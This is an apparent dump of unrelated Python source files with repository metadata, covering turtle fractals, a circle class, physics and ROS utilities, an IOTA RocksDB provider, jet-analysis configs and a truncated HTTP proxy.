turtle.forward(size)
turtle.right(90)
turtle.end_fill()
def drosteDraw(drawFunction, size, recursiveDrawings, extraData=None):
# NOTE: The current heading of the turtle is considered to be the
# rightward or positive-x direction.
# Provide default values for extraData:
if extraData is None:
extraData = {}
if '_iteration' not in extraData:
extraData['_iteration'] = 1 # The first iteration is 1, not 0.
if '_maxIteration' not in extraData:
extraData['_maxIteration'] = MAX_ITERATION
if '_maxFunctionCalls' not in extraData:
extraData['_maxFunctionCalls'] = MAX_FUNCTION_CALLS
if '_minSize' not in extraData:
extraData['_minSize'] = MIN_SIZE
requiredNumCalls = len(recursiveDrawings) ** extraData['_iteration']
if extraData['_iteration'] > extraData['_maxIteration'] or \
requiredNumCalls > extraData['_maxFunctionCalls'] or \
size < extraData['_minSize']:
return # BASE CASE
# Remember the original starting coordinates and heading.
origX = turtle.xcor()
origY = turtle.ycor()
origHeading = turtle.heading()
turtle.pendown()
drawFunction(size, extraData)
turtle.penup()
# RECURSIVE CASE
# Do each of the recursive drawings:
for i, recursiveDrawing in enumerate(recursiveDrawings):
# Provide default values for the recursiveDrawing dictionary:
if 'x' not in recursiveDrawing:
recursiveDrawing['x'] = 0
if 'y' not in recursiveDrawing:
recursiveDrawing['y'] = 0
if 'size' not in recursiveDrawing:
recursiveDrawing['size'] = 1.0
if 'angle' not in recursiveDrawing:
recursiveDrawing['angle'] = 0
# Move the turtle into position for the next recursive drawing:
turtle.goto(origX, origY)
turtle.setheading(origHeading + recursiveDrawing['angle'])
turtle.forward(size * recursiveDrawing['x'])
turtle.left(90)
turtle.forward(size * recursiveDrawing['y'])
turtle.right(90)
# Increment the iteration count for the next level of recursion:
extraData['_iteration'] += 1
drosteDraw(drawFunction, int(size * recursiveDrawing['size']), recursiveDrawings, extraData)
# Decrement the iteration count when done with that recursion:
extraData['_iteration'] -= 1
# Display any buffered drawing commands on the screen:
if extraData['_iteration'] == 1:
turtle.update()
_DEMO_NUM = 0
def demo(x=None, y=None):
global _DEMO_NUM
turtle.reset()
turtle.tracer(20000, 0) # Increase the first argument to speed up the drawing.
turtle.hideturtle()
if _DEMO_NUM == 0:
# Recursively draw smaller squares in the center:
drosteDraw(drawSquare, 350, [{'size': 0.8}])
elif _DEMO_NUM == 1:
# Recursively draw smaller squares going off to the right:
drosteDraw(drawSquare, 350, [{'size': 0.8, 'x': 0.20}])
elif _DEMO_NUM == 2:
# Recursively draw smaller squares that go up at an angle:
drosteDraw(drawSquare, 350, [{'size': 0.8, 'y': 0.20, 'angle': 15}])
elif _DEMO_NUM == 3:
# Recursively draw smaller triangle in the center:
drosteDraw(drawTriangle, 350, [{'size': 0.8}])
elif _DEMO_NUM == 4:
# Recursively draw smaller triangle going off to the right:
drosteDraw(drawTriangle, 350, [{'size': 0.8, 'x': 0.20}])
elif _DEMO_NUM == 5:
# Recursively draw smaller triangle that go up at an angle:
drosteDraw(drawTriangle, 350, [{'size': 0.8, 'y': 0.20, 'angle': 15}])
elif _DEMO_NUM == 6:
# Recursively draw a spirograph of squares:
drosteDraw(drawSquare, 150, [{'angle': 10, 'x': 0.1}])
elif _DEMO_NUM == 7:
# Recursively draw a smaller square in each of the four corners of the parent square:
drosteDraw(drawSquare, 350, [{'size': 0.5, 'x': -0.5, 'y': 0.5},
{'size': 0.5, 'x': 0.5, 'y': 0.5},
{'size': 0.5, 'x': -0.5, 'y': -0.5},
{'size': 0.5, 'x': 0.5, 'y': -0.5}])
elif _DEMO_NUM == 8:
# Recursively draw smaller filled squares in the center, alternating red and black:
drosteDraw(drawFilledSquare, 350, [{'size': 0.8}], {'colors': ['red', 'black']})
elif _DEMO_NUM == 9:
# Recursively draw a smaller filled square in each of the four corners of the parent square with red and black:
drosteDraw(drawFilledSquare, 350, [{'size': 0.5, 'x': -0.5, 'y': 0.5},
{'size': 0.5, 'x': 0.5, 'y': 0.5},
{'size': 0.5, 'x': -0.5, 'y': -0.5},
{'size': 0.5, 'x': 0.5, 'y': -0.5}], {'colors': ['red', 'black']})
elif _DEMO_NUM == 10:
# Recursively draw a smaller filled square in each of the four corners of the parent square with white and black:
drosteDraw(drawFilledSquare, 350, [{'size': 0.5, 'x': -0.5, 'y': 0.5},
{'size': 0.5, 'x': 0.5, 'y': 0.5},
{'size': 0.5, 'x': -0.5, 'y': -0.5},
{'size': 0.5, 'x': 0.5, 'y': -0.5}], {'colors': ['white', 'black']})
elif _DEMO_NUM == 11:
# Recursively draw a smaller filled square in each of the four corners of the parent square:
drosteDraw(drawFilledDiamond, 350, [{'size': 0.5, 'x': -0.45, 'y': 0.45},
{'size': 0.5, 'x': 0.45, 'y': 0.45},
{'size': 0.5, 'x': -0.45, 'y': -0.45},
{'size': 0.5, 'x': 0.45, 'y': -0.45}], {'colors': ['green', 'yellow']})
elif _DEMO_NUM == 12:
# Draw the sierpinsky triangle:
drosteDraw(drawTriangle, 600, [{'size': 0.5, 'x': 0, 'y': math.sqrt(3) / 6, 'angle': 0},
{'size': 0.5, 'x': 0, 'y': math.sqrt(3) / 6, 'angle': 120},
{'size': 0.5, 'x': 0, 'y': math.sqrt(3) / 6, 'angle': 240}])
elif _DEMO_NUM == 13:
# Draw a recursive "glider" shape from Conway's Game of Life:
drosteDraw(drawSquare, 600, [{'size': 0.333, 'x': 0, 'y': 0.333},
{'size': 0.333, 'x': 0.333, 'y': 0},
{'size': 0.333, 'x': 0.333, 'y': -0.333},
{'size': 0.333, 'x': 0, 'y': -0.333},
{'size': 0.333, 'x': -0.333, 'y': -0.333}])
turtle.exitonclick()
_DEMO_NUM += 1
def main():
# Start the demo:
turtle.onscreenclick(demo)
demo()
turtle.mainloop()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
e0d852a289aa3a8e3aca62072d98ba4f2cf26939 | 33524b5c049f934ce27fbf046db95799ac003385 | /2018/Other/Urok_10_0_классы_объекты/teoriya_class_0.py | 68f7a2ba67558f66e7e39854b191bc7d8ef21224 | [] | no_license | mgbo/My_Exercise | 07b5f696d383b3b160262c5978ad645b46244b70 | 53fb175836717493e2c813ecb45c5d5e9d28dd23 | refs/heads/master | 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py |
from math import pi
class Circle:
def __init__(self, x=0, y=0, r=0):
self.x = x
self.y = y
self.r = r
def __str__(self):
return "({},{},{})".format(self.x,self.y,self.r)
def read(self):
self.x,self.y,self.r = map(int,input().split())
def area(self):
a = pi*self.r * self.r
return a
def perimetr(self):
return 2*pi*self.r
def zoom(self, k):
self.r *=k
def is_crossed(self, c): # пересекается или нет окружность с окружностью с?
d2 = (self.x - c.x)**2 + (self.y - c.y)**2
r2 =(self.r + c.r)**2
return d2 <=r2
c1 = Circle()
c2 = Circle()
'''
c1.r = 3
c2.r = 5
c2.x = 1
c2.y = 1
'''
c1.read()
c2.read()
print (c1)
print (c2)
'''
ans = c1.area()
print (ans)
'''
| [
"[email protected]"
] | |
bbf5068fcd5c3270cf2448fddc69044e5fb04048 | ddac7346ca9f1c1d61dfd7b3c70dc6cd076a9b49 | /tests/test_calculators.py | ea4ae7c9ee767f607d8382ac221cc57272a8fee0 | [
"MIT"
] | permissive | gvenus/dftfit | f8cf5e9bef5a173ff0aa7202bacbfee0df61bd14 | a00354f8f0d611bf57c6925f920c749d8628cf98 | refs/heads/master | 2023-03-17T18:58:52.287217 | 2019-10-20T04:07:44 | 2019-10-20T04:07:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,979 | py | import asyncio
import shutil
import pymatgen as pmg
import numpy as np
import pytest
from dftfit.io.lammps import LammpsLocalDFTFITCalculator
from dftfit.io.lammps_cython import LammpsCythonDFTFITCalculator
from dftfit.cli.utils import load_filename
from dftfit.potential import Potential
@pytest.mark.pymatgen_lammps
@pytest.mark.lammps_cython
@pytest.mark.calculator
def test_calculator_equivalency(structure):
target_a = 4.1990858
s = structure('test_files/structure/MgO.cif')
lattice = pmg.Lattice.from_parameters(target_a, target_a, target_a, 90, 90, 90)
s.modify_lattice(lattice)
assert np.all(np.isclose(s.lattice.abc, (target_a, target_a, target_a)))
s = s * (2, 2, 2)
assert len(s) == 64
base_directory = 'test_files/dftfit_calculators/'
potential_schema = load_filename(base_directory + 'potential.yaml')
potential_schema['spec']['charge']['Mg']['initial'] = 1.4
potential_schema['spec']['charge']['O']['initial'] = -1.4
potential = Potential(potential_schema)
command = None
if shutil.which('lammps'): command = 'lammps'
elif shutil.which('lmp_serial'): command = 'lmp_serial'
calculators = [
LammpsLocalDFTFITCalculator(structures=[s], potential=potential, command=command, num_workers=1),
LammpsCythonDFTFITCalculator(structures=[s], potential=potential)
]
loop = asyncio.get_event_loop()
results = []
async def run(calc, potential):
await calc.create()
return await calc.submit(potential)
for calc in calculators:
results.append(loop.run_until_complete(run(calc, potential)))
assert len(results) == 2
assert len(results[0]) == 1
assert len(results[1]) == 1
for r1, r2 in zip(*results):
assert r1.structure == r2.structure
assert abs(r1.energy - r2.energy) < 1e-4
assert np.all(np.isclose(r1.forces, r2.forces, atol=1e-8))
assert np.all(np.isclose(r1.stress, r2.stress, atol=1e-8))
| [
"[email protected]"
] | |
bde27465e5215f809b247a635fd24f3186193786 | 0698be34413debeb570e2560072c5696433acd81 | /ForkTube/celeryconfig.py | 1a437d56f6e0390a359e88338fe971e211e45e34 | [] | no_license | Miserlou/ForkTube | 90a057c459fda4b8d92d94f89c9d86bf786549ca | 848fdf4ff81c1d70b03c30a6382c8464dd4f25fe | refs/heads/master | 2020-05-19T07:47:44.130888 | 2012-04-09T19:53:24 | 2012-04-09T19:53:24 | 2,363,212 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | BROKER_HOST = "localhost"
BROKER_PORT = 5672
BROKER_USER = "myuser"
BROKER_PASSWORD = "mypassword"
BROKER_VHOST = "myvhost"
CELERY_RESULT_BACKEND = "amqp"
CELERY_IMPORTS = ("tasks", )
| [
"[email protected]"
] | |
38bae379c04d24789026484a687ef0293b07e1f4 | d346c1e694e376c303f1b55808d90429a1ad3c3a | /medium/61.rotate_list.py | 86f5af201842b8ba886e5132edcc3439263c61a5 | [] | no_license | littleliona/leetcode | 3d06bc27c0ef59b863a2119cd5222dc94ed57b56 | 789d8d5c9cfd90b872be4a4c35a34a766d95f282 | refs/heads/master | 2021-01-19T11:52:11.938391 | 2018-02-19T03:01:47 | 2018-02-19T03:01:47 | 88,000,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,234 | py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
#
current = head
storeList = []
while current != None:
storeList.append(current)
current = current.next
if len(storeList) <= 1:
return head
k = k % len(storeList)
if k == 0:
return head
res = storeList[-k]
storeList[-k - 1].next = None
storeList[-1].next = head
return res
#mine
if not head or not head.next or k == 0:
return head
length_list = 1
current = head
while current.next:
current = current.next
length_list += 1
current.next = head
current = head
for i in range(1,length_list - (k % length_list)):
current = current.next
head = current.next
current.next = None
return head
s = Solution()
a = s.threeSum([-1,0,1,2,-1,-4])
print(a)
| [
"[email protected]"
] | |
3610918d2b73d9d7fb9529196d9121b89800d8c4 | 03901933adfaa9130979b36f1e42fb67b1e9f850 | /iotapy/storage/providers/rocksdb.py | a1b6d630c97ebda8f54229ab370820ab8f9b63f1 | [
"MIT"
] | permissive | aliciawyy/iota-python | 03418a451b0153a1c55b3951d18d4cb533c7ff28 | b8d421acf94ccd9e7374f799fbe496f6d23e3cf3 | refs/heads/master | 2020-03-19T04:15:54.594313 | 2018-06-04T18:26:52 | 2018-06-04T18:26:52 | 135,811,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,363 | py | # -*- coding: utf-8 -*-
import struct
import iota
import rocksdb_iota
import iotapy.storage.providers.types
from rocksdb_iota.merge_operators import StringAppendOperator
from iotapy.storage import converter
KB = 1024
MB = KB * 1024
MERGED = ['tag', 'bundle', 'approvee', 'address', 'state_diff']
class RocksDBProvider:
BLOOM_FILTER_BITS_PER_KEY = 10
column_family_names = [
b'default',
b'transaction',
b'transaction-metadata',
b'milestone',
b'stateDiff',
b'address',
b'approvee',
b'bundle',
b'tag'
]
column_family_python_mapping = {
'transaction_metadata': 'transaction-metadata',
'state_diff': 'stateDiff'
}
def __init__(self, db_path, db_log_path, cache_size=4096, read_only=True):
self.db = None
self.db_path = db_path
self.db_log_path = db_log_path
self.cache_size = cache_size
self.read_only = read_only
self.available = False
def init(self):
self.init_db(self.db_path, self.db_log_path)
self.available = True
def init_db(self, db_path, db_log_path):
options = rocksdb_iota.Options(
create_if_missing=True,
db_log_dir=db_log_path,
max_log_file_size=MB,
max_manifest_file_size=MB,
max_open_files=10000,
max_background_compactions=1
)
options.allow_concurrent_memtable_write = True
# XXX: How to use this?
block_based_table_config = rocksdb_iota.BlockBasedTableFactory(
filter_policy=rocksdb_iota.BloomFilterPolicy(self.BLOOM_FILTER_BITS_PER_KEY),
block_size_deviation=10,
block_restart_interval=16,
block_cache=rocksdb_iota.LRUCache(self.cache_size * KB),
block_cache_compressed=rocksdb_iota.LRUCache(32 * KB, shard_bits=10))
options.table_factory = block_based_table_config
# XXX: How to use this?
column_family_options = rocksdb_iota.ColumnFamilyOptions(
merge_operator=StringAppendOperator(),
table_factory=block_based_table_config,
max_write_buffer_number=2,
write_buffer_size=2 * MB)
try:
self.db = rocksdb_iota.DB(
self.db_path, options, self.column_family_names,
read_only=self.read_only)
except rocksdb_iota.errors.InvalidArgument as e:
if 'Column family not found' in str(e):
# Currently, rocksdb_iota didn't support
# "create_if_column_family_missing" option, if we detect this
# is a new database, we will need to create its whole
# column family manually.
self.db = rocksdb_iota.DB(
self.db_path, options, [b'default'], read_only=self.read_only)
# Skip to create b'default'
for column_family in self.column_family_names[1:]:
self.db.create_column_family(column_family)
else:
raise e
def _convert_column_to_handler(self, column):
if not isinstance(column, str):
raise TypeError('Column type should be str')
db_column = self.column_family_python_mapping.get(column, column)
ch = self.db.column_family_handles.get(bytes(db_column, 'ascii'))
if ch is None:
raise KeyError('Invalid column family name: %s' % (column))
return ch
def _convert_key_column(self, key, column):
# Convert column to column family handler
ch = self._convert_column_to_handler(column)
# Expand iota.Tag to iota.Hash
if column == 'tag':
if not isinstance(key, iota.Tag):
raise TypeError('Tag key type should be iota.Tag')
key = iota.Hash(str(key))
# Convert key into trits-binary
if column == 'milestone':
if not isinstance(key, int):
raise TypeError('Milestone key type should be int')
key = struct.pack('>l', key)
else:
if not isinstance(key, iota.TryteString):
raise TypeError('Key type should be iota.TryteString')
if len(key) != iota.Hash.LEN:
raise ValueError('Key length must be 81 trytes')
key = converter.from_trits_to_binary(key.as_trits())
return key, ch
def _get(self, key, bytes_, column):
# Convert value (bytes_) into data object
obj = getattr(iotapy.storage.providers.types, column).get(bytes_, key)
# Handle metadata
if obj and key and column == 'transaction':
obj.set_metadata(self.get(key, 'transaction_metadata'))
return obj
def _get_key(self, bytes_, column):
return getattr(iotapy.storage.providers.types, column).get_key(bytes_)
def _save(self, value, column):
# Convert value to bytes
return getattr(iotapy.storage.providers.types, column).save(value)
def get(self, key, column):
k, ch = self._convert_key_column(key, column)
# Get binary data from database
bytes_ = self.db.get(k, ch)
return self._get(key, bytes_, column)
def next(self, key, column):
key, ch = self._convert_key_column(key, column)
it = self.db.iteritems(ch)
it.seek(key)
next(it)
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def first(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_first()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def latest(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_last()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def may_exist(self, key, column, fetch=False):
key, ch = self._convert_key_column(key, column)
# XXX: Not working......
return self.db.key_may_exist(key, ch)[0]
def save(self, key, value, column):
key, ch = self._convert_key_column(key, column)
value = self._save(value, column)
self.db.put(key, value, ch)
def store(self, key, value, column):
# Store is different then save, currently deailing with transaction
# that transaction will save more data to other column
batches = getattr(iotapy.storage.providers.types, column).store(key, value)
write_batch = rocksdb_iota.WriteBatch()
for k, v, column in batches:
k, ch = self._convert_key_column(k, column)
v = self._save(v, column)
if column in MERGED:
write_batch.merge(k, v, ch)
else:
write_batch.put(k, v, ch)
self.db.write(write_batch)
| [
"[email protected]"
] | |
710f90e901aebc0be4d31eed525c04c01665c3e0 | 3ad6d731c994813a10801829c45f56c58ff9021d | /src/teleop_bot/src/keys_to_twist_with_ramps.py | f8bf0f492753a4cd8e20f5fa2477366b8f82f090 | [] | no_license | bladesaber/ROS_tutorial | 9b4ae5a9a1bd773ae48d836a87d08bde8a757a5d | 63486048786ebc864bc731eb1b524a72e9267738 | refs/heads/master | 2022-11-16T07:36:15.938433 | 2020-07-07T02:47:50 | 2020-07-07T02:47:50 | 277,693,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,584 | py | #!/usr/bin/env python
import rospy
import math
from std_msgs.msg import String
from geometry_msgs.msg import Twist
key_mapping = { 'w': [ 0, 1], 'x': [ 0, -1],
'a': [ 1, 0], 'd': [-1, 0],
's': [ 0, 0] }
g_twist_pub = None
g_target_twist = None
g_last_twist = None
g_last_send_time = None
g_vel_scales = [0.1, 0.1] # default to very slow
g_vel_ramps = [1, 1] # units: meters per second^2
def ramped_vel(v_prev, v_target, t_prev, t_now, ramp_rate):
# compute maximum velocity step
step = ramp_rate * (t_now - t_prev).to_sec()
sign = 1.0 if (v_target > v_prev) else -1.0
error = math.fabs(v_target - v_prev)
if error < step: # we can get there within this timestep. we're done.
return v_target
else:
return v_prev + sign * step # take a step towards the target
def ramped_twist(prev, target, t_prev, t_now, ramps):
tw = Twist()
tw.angular.z = ramped_vel(prev.angular.z, target.angular.z, t_prev,
t_now, ramps[0])
tw.linear.x = ramped_vel(prev.linear.x, target.linear.x, t_prev,
t_now, ramps[1])
return tw
def send_twist():
global g_last_twist_send_time, g_target_twist, g_last_twist,\
g_vel_scales, g_vel_ramps, g_twist_pub
t_now = rospy.Time.now()
g_last_twist = ramped_twist(g_last_twist, g_target_twist,
g_last_twist_send_time, t_now, g_vel_ramps)
g_last_twist_send_time = t_now
g_twist_pub.publish(g_last_twist)
def keys_cb(msg):
global g_target_twist, g_last_twist, g_vel_scales
if len(msg.data) == 0 or not key_mapping.has_key(msg.data[0]):
return # unknown key.
vels = key_mapping[msg.data[0]]
g_target_twist.angular.z = vels[0] * g_vel_scales[0]
g_target_twist.linear.x = vels[1] * g_vel_scales[1]
def fetch_param(name, default):
if rospy.has_param(name):
return rospy.get_param(name)
else:
print "parameter [%s] not defined. Defaulting to %.3f" % (name, default)
return default
if __name__ == '__main__':
rospy.init_node('keys_to_twist')
g_last_twist_send_time = rospy.Time.now()
g_twist_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
rospy.Subscriber('keys', String, keys_cb)
g_target_twist = Twist() # initializes to zero
g_last_twist = Twist()
g_vel_scales[0] = fetch_param('~angular_scale', 0.1)
g_vel_scales[1] = fetch_param('~linear_scale', 0.1)
g_vel_ramps[0] = fetch_param('~angular_accel', 1.0)
g_vel_ramps[1] = fetch_param('~linear_accel', 1.0)
rate = rospy.Rate(20)
while not rospy.is_shutdown():
send_twist()
rate.sleep() | [
"[email protected]"
] | |
73fe66859a65e73496b91d800a11f82a54258308 | a85419f08198548eb6ba4d3df0d181769f810358 | /C_Carray/split_for_singlechannel_tests.py | 4887feeda442f244c49cc385774a1b017c5a6ddf | [] | no_license | keflavich/w51evlareductionscripts | cd0287d750d938bab96f1a7d335b3b84c27a987f | 00cb8085e8fe5c047f53852c8057a1f7457863f6 | refs/heads/master | 2021-01-17T07:26:01.574220 | 2016-07-07T09:02:26 | 2016-07-07T09:02:26 | 8,590,805 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 650 | py | # June 29, 2015
# Instead, use h2co_cvel_split in ../C_AC
# outputvis_A = 'h2co11_Cband_Aarray_nocal_20to100kms.ms'
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_20kms_onechan.ms',
# spw='0:0', width=1)
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_57kms_onechan.ms',
# spw='0:74', width=1)
# outputvis_C = 'h2co11_Cband_Carray_nocal_20to100kms.ms'
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_20kms_onechan.ms',
# spw='0:0', width=1, datacolumn='data')
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_57kms_onechan.ms',
# spw='0:74', width=1, datacolumn='data')
| [
"[email protected]"
] | |
2e5daa13e1b08a262d40a179079d7d11029e9af2 | 5a0d6fff86846117420a776e19ca79649d1748e1 | /rllib_exercises/serving/do_rollouts.py | d2dff98d01aa7e23c66a2e98eb958ee472389934 | [] | no_license | ray-project/tutorial | d823bafa579fca7eeb3050b0a13c01a542b6994e | 08f4f01fc3e918c997c971f7b2421551f054c851 | refs/heads/master | 2023-08-29T08:46:38.473513 | 2022-03-21T20:43:22 | 2022-03-21T20:43:22 | 89,322,668 | 838 | 247 | null | 2022-03-21T20:43:22 | 2017-04-25T05:55:26 | Jupyter Notebook | UTF-8 | Python | false | false | 1,596 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import argparse
import gym
from ray.rllib.utils.policy_client import PolicyClient
parser = argparse.ArgumentParser()
parser.add_argument(
"--no-train", action="store_true", help="Whether to disable training.")
parser.add_argument(
"--off-policy",
action="store_true",
help="Whether to take random instead of on-policy actions.")
if __name__ == "__main__":
args = parser.parse_args()
import pong_py
env = pong_py.PongJSEnv()
client = PolicyClient("http://localhost:8900")
eid = client.start_episode(training_enabled=not args.no_train)
obs = env.reset()
rewards = 0
episode = []
f = open("out.txt", "w")
while True:
if args.off_policy:
action = env.action_space.sample()
client.log_action(eid, obs, action)
else:
action = client.get_action(eid, obs)
next_obs, reward, done, info = env.step(action)
episode.append({
"obs": obs.tolist(),
"action": float(action),
"reward": reward,
})
obs = next_obs
rewards += reward
client.log_returns(eid, reward, info=info)
if done:
print("Total reward:", rewards)
f.write(json.dumps(episode))
f.write("\n")
f.flush()
rewards = 0
client.end_episode(eid, obs)
obs = env.reset()
eid = client.start_episode(training_enabled=not args.no_train)
| [
"[email protected]"
] | |
15701489ab41edd41261b2b31779b163a468529e | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/akVs3CaloJetSequence_pPb_mix_cff.py | 3d77c27baa5beb48450caf86750981f27c601170 | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,519 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
akVs3Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("ak3HiGenJetsCleaned")
)
akVs3Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
akVs3Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akVs3CaloJets"),
payload = "AKVs3Calo_HI"
)
akVs3CalopatJets = patJets.clone(jetSource = cms.InputTag("akVs3CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akVs3Calocorr")),
genJetMatch = cms.InputTag("akVs3Calomatch"),
genPartonMatch = cms.InputTag("akVs3Caloparton"),
jetIDMap = cms.InputTag("akVs3CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
akVs3CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akVs3CalopatJets"),
genjetTag = 'ak3HiGenJetsCleaned',
rParam = 0.3,
matchJets = cms.untracked.bool(True),
matchTag = 'akPu3CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
akVs3CaloJetSequence_mc = cms.Sequence(
akVs3Calomatch
*
akVs3Caloparton
*
akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_data = cms.Sequence(akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_jec = akVs3CaloJetSequence_mc
akVs3CaloJetSequence_mix = akVs3CaloJetSequence_mc
akVs3CaloJetSequence = cms.Sequence(akVs3CaloJetSequence_mix)
| [
"[email protected]"
] | |
8f8199b6e1f6dfc54c783f31a9ee7c30b7a68a8b | 86c082438a001ba48617aa756439b34423387b40 | /src/the_tale/the_tale/accounts/jinjaglobals.py | a2404ff781af031fd621d00f6e3091150a03094c | [
"BSD-3-Clause"
] | permissive | lustfullyCake/the-tale | a6c02e01ac9c72a48759716dcbff42da07a154ab | 128885ade38c392535f714e0a82fb5a96e760f6d | refs/heads/master | 2020-03-27T21:50:56.668093 | 2018-06-10T17:39:48 | 2018-06-10T17:39:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,295 | py | # coding: utf-8
from dext.common.utils import jinja2
from the_tale.accounts import logic
from the_tale.accounts import conf
@jinja2.jinjaglobal
def login_page_url(next_url='/'):
return jinja2.Markup(logic.login_page_url(next_url))
@jinja2.jinjaglobal
def login_url(next_url='/'):
return jinja2.Markup(logic.login_url(next_url))
@jinja2.jinjaglobal
def logout_url():
return jinja2.Markup(logic.logout_url())
@jinja2.jinjaglobal
def forum_complaint_theme():
return conf.accounts_settings.FORUM_COMPLAINT_THEME
@jinja2.jinjaglobal
def account_sidebar(user_account, page_account, page_caption, page_type, can_moderate=False):
from the_tale.forum.models import Thread
from the_tale.game.bills.prototypes import BillPrototype
from the_tale.linguistics.prototypes import ContributionPrototype
from the_tale.linguistics.relations import CONTRIBUTION_TYPE
from the_tale.accounts.friends.prototypes import FriendshipPrototype
from the_tale.accounts.clans.logic import ClanInfo
from the_tale.blogs.models import Post as BlogPost, POST_STATE as BLOG_POST_STATE
bills_count = BillPrototype.accepted_bills_count(page_account.id)
threads_count = Thread.objects.filter(author=page_account._model).count()
threads_with_posts = Thread.objects.filter(post__author=page_account._model).distinct().count()
templates_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.TEMPLATE).count()
words_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.WORD).count()
folclor_posts_count = BlogPost.objects.filter(author=page_account._model, state=BLOG_POST_STATE.ACCEPTED).count()
friendship = FriendshipPrototype.get_for_bidirectional(user_account, page_account)
return jinja2.Markup(jinja2.render('accounts/sidebar.html',
context={'user_account': user_account,
'page_account': page_account,
'page_caption': page_caption,
'master_clan_info': ClanInfo(page_account),
'own_clan_info': ClanInfo(user_account),
'friendship': friendship,
'bills_count': bills_count,
'templates_count': templates_count,
'words_count': words_count,
'folclor_posts_count': folclor_posts_count,
'threads_count': threads_count,
'threads_with_posts': threads_with_posts,
'can_moderate': can_moderate,
'page_type': page_type,
'commission': conf.accounts_settings.MONEY_SEND_COMMISSION}))
| [
"[email protected]"
] | |
3f0d333958350a92ac434aa6a8017a17d263453d | 2d929ed82d53e7d70db999753c60816ed00af171 | /Python/http/http_proxy.py | 413b48f03f8f201e702d427e39d87f53adca2682 | [] | no_license | nyannko/socket-example | b058e68e8d41a8a9f5b6a29108f7de394751c904 | 934e9791b1ee92f0dd3092bb07541f1e833b4105 | refs/heads/master | 2021-09-10T19:19:24.590441 | 2018-03-14T22:13:49 | 2018-03-14T22:13:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,577 | py | # HTTP proxy
from http.server import BaseHTTPRequestHandler, HTTPServer
from urlpath import URL
import socket
import urllib
HOST = "127.0.0.1"
PORT = 8000
# Run `curl -x http://127.0.0.1:8000 http://www.moe.edu.cn' to test proxy
class ProxyHandler(BaseHTTPRequestHandler):
# GET method
def do_GET(self):
# todo add try catch here
url = URL(self.path)
ip = socket.gethostbyname(url.netloc)
port = url.port
if port is None:
port = 80
path = url.path
print("Connected to {} {} {}".format(url ,ip ,port))
# close connection
del self.headers["Proxy-Connection"]
self.headers["Connection"] = "close"
# reconstruct headers
send_data = "GET " + path + " " + self.protocol_version + "\r\n"
header = ""
for k, v in self.headers.items():
header += "{}: {}\r\n".format(k, v)
send_data += header + "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((ip, port))
s.sendall(send_data.encode())
